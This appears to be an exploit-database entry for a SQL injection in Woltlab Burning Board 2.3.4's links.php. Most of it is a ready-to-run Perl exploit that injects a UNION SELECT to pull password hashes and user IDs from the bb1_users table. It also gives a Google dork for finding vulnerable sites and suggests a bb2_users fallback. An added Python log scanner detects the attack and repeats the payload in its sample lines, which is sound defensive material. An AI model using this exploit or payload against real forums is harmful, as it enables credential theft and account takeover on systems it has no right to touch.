Vendor: Burning Board
By: 666 (SR-Crew)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Burning Board
Affected Version From: 2.3.4
Affected Version To: 2.3.4
Patch Exists: YES
Related CWE: N/A
CPE: a:woltlab:burning_board:2.3.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2006

Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit

This exploit targets a SQL injection flaw in the Woltlab Burning Board 2.3.4 web application. The vulnerable input is the "cat" parameter of "links.php": the script below appends a UNION SELECT to it that reads the password and userid columns from the bb1_users table, then looks for a 32-character hash in the returned page. By exploiting this vulnerability, an attacker can gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                            ##
##  Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Exploit by       |  666 (SR-Crew)                                         ##
##  Bug by           |  x82                                                   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                             ##
##  Usage            |  links.pl [server] [path]                              ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "[+] Exploiting....\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
	if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {
		break;
	}
}

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
	if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {
		print "[+] Try replacing bb1_users with bb2_users\n";
		break;
	}
}
close($sock);

print "[+] Exploit failed\n";

# milw0rm.com [2006-05-20]
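
The request the script above sends is visible in web server access logs. The following is an added example, not part of the original exploit or of Burning Board: it flags links.php requests whose cat value is not a plain integer, which is the same check the mitigation section asks the application to apply. It assumes Combined Log Format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Combined Log Format (request line, status, size, referer, user agent).
LOG_RE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

def classify(line):
    """Return None for unrelated or well-formed requests, else a finding dict."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # urlsplit copes with both "/path?query" and the absolute-form
    # "http://host/path?query" target that the script above sends.
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/links.php"):
        return None
    # parse_qs decodes %xx and '+', so encoded variants compare equal.
    values = parse_qs(url.query, keep_blank_values=True).get("cat", [])
    bad = [v for v in values if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return None
    reasons = ["non-numeric cat"]
    if any(UNION_RE.search(v) for v in bad):
        reasons.append("union select")
    if m.group("ua") == "Hacker":  # fixed User-Agent header set by the script
        reasons.append("exploit user-agent")
    return {"cat": bad[0], "reasons": reasons}

# Constructed sample log lines (documentation IP range, placeholder host name).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/May/2006:10:00:00 +0000] "GET /wbb2/links.php?cat=5 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [20/May/2006:10:00:05 +0000] "GET http://forum.example/wbb2/'
    'links.php?cat=31337+union+select+password,userid+from+bb1_users '
    'HTTP/1.1" 200 4811 "-" "Hacker"',
    '192.0.2.67 - - [20/May/2006:10:01:00 +0000] "GET /wbb2/links.php?cat=31337%20'
    'UNION%20SELECT%20password,userid%20FROM%20bb2_users HTTP/1.1" 200 4790 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [20/May/2006:10:02:00 +0000] "GET /wbb2/index.php?cat=abc '
    'HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = classify(entry)
        if finding:
            print(entry.split()[0], finding["reasons"], repr(finding["cat"]))
```

A 200 response to a flagged request is worth following up, since the script only reports a hash when the page is returned successfully.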